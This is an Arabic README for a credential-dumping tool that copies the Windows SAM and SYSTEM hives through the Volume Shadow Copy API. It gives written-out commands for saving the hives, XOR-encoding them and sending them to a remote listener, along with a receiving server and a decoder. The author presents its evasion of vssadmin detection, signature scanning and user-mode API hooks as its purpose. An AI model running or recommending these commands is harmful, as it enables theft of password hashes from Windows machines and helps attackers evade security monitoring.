
استخرج سجلات SAM و SYSTEM باستخدام واجهة برمجة تطبيقات نسخ الظل لوحدة التخزين (VSS). مع خيارات استخراج البيانات والتعتيم عبر XOR. بلغات C# و C++ و Crystal و Python و Rust و Golang و Nim و Deno (جافاسكريبت)
يستخرج ملفات SAM وSYSTEM الخاصة بنظام ويندوز باستخدام خدمة نسخ الظل لوحدة التخزين (VSS) مع خيارات متعددة للتسريب وتشفير XOR:
تم تنفيذ الأداة بلغات C++، C#، Crystal وPython، وتعمل على الإصدارات الحديثة من ويندوز.
تتطلب صلاحيات مرتفعة، وإذا تم إنشاء نسخة الظل فسيتم حذفها تلقائيًا بعد حوالي 5 دقائق.
SAMDump.exe [OPTIONS]
Options:
--save-local [BOOL] Save locally (default: false)
--output-dir DIR Output directory (default: C:\Windows\tasks)
--send-remote [BOOL] Send remotely (default: false)
--host IP Host for remote sending (default: 127.0.0.1)
--port PORT Port for remote sending (default: 7777)
--xor-encode [BOOL] XOR Encode (default: false)
--xor-key KEY Enable XOR with specified key (default: SAMDump2025)
--disk DISK Disk for shadow copy (default: C:\)
--help Show this help
الحفظ محليًا بدون تشفير:
SAMDump.exe --save-local --output-dir "C:\temp"

الحفظ محليًا مع تشفير XOR:
SAMDump.exe --save-local --xor-encode --xor-key "SAMDump2025"

الإرسال إلى خادم بعيد مع تشفير XOR والمفتاح الافتراضي:
SAMDump.exe --send-remote --host 192.168.1.72 --port 1234 --xor-encode

server.py هو خادم بايثون يستقبل الملفات عبر الشبكة مع فك تشفير XOR تلقائي وتنسيق اسم الملف:
python server.py [OPTIONS]
Options:
--host HOST IP address to listen on (default: 0.0.0.0)
--port PORT Port to listen on (default: 7777)
--xor-key KEY Key for XOR decoding (optional)
مستمع على واجهة ومنفذ محددين مع مفتاح XOR:
python server.py --host 192.168.1.72 --port 1234 --xor-key "SAMDump2025"

يحتوي اسم الملف على عنوان IP والتاريخ، مما يتيح إرسال الملفات من أنظمة مختلفة وأتمتة العملية.
xor-decoder.py هو برنامج نصي بلغة بايثون لفك تشفير ملفات SAM وSYSTEM المشفرة بـ XOR محليًا:
python xor-decoder.py [OPTIONS]
Options:
--sam SAM Path to encoded SAM file (required)
--system SYSTEM Path to encoded SYSTEM file (required)
--xor-key KEY XOR key for decoding (default: SAMDump2025)
--output-dir DIR Output directory for decoded files (default: ./decoded)
فك التشفير بالمفتاح الافتراضي:
python xor-decoder.py --sam sam.txt --system system.txt

فك التشفير بمفتاح مخصص ودليل إخراج:
python xor-decoder.py --sam sam.txt --system system.txt --xor-key "MyKey" --output-dir ./results

يتضمن المشروع إصدارات مطبقة بثلاث لغات:
comtypes (pip install comtypes)أردت أتمتة هذه العملية ومعظم أنظمة ويندوز التي أجدها تشغل VSS، لكن حلول الأمان تكتشف استخدام vssadmin لإنشاء نسخ الظل واستخراج هذه الملفات لأنها تقنية معروفة.
تستخرج هذه الأداة الملفات دون الكتابة على نظام الملفات المستهدف عند استخدام وضع النقل البعيد؛ ويوفر تشفير XOR تعتيمًا أساسيًا لتجنب الكشف القائم على التوقيع (حتى عند استخدام الوضع البعيد).
بالإضافة إلى ذلك، تستخدم استدعاءات NT API لتجاوز بعض أنظمة المراقبة وخطافات API في وضع المستخدم.
تستخدم الأداة استدعاءات نظام NT بدلاً من دوال Windows API القياسية، مما قد يتجاوز بعض خطافات API في وضع المستخدم التي تتم مراقبتها عادةً:
NtCreateFile و NtReadFile: تُستخدم لفتح مقبض وقراءة بايتات ملفات SAM وSYSTEM في نسخة الظل
NtWriteFile: تُستخدم لحفظ الملفات محليًا
شكرًا لـ @vx-underground على تحديد واقتراح تحسينات في كود التنقل عبر جدول عناوين التصدير (EAT)، واستبدال استدعاءات NtReadVirtualMemory غير الضرورية بالوصول المباشر عبر المؤشرات.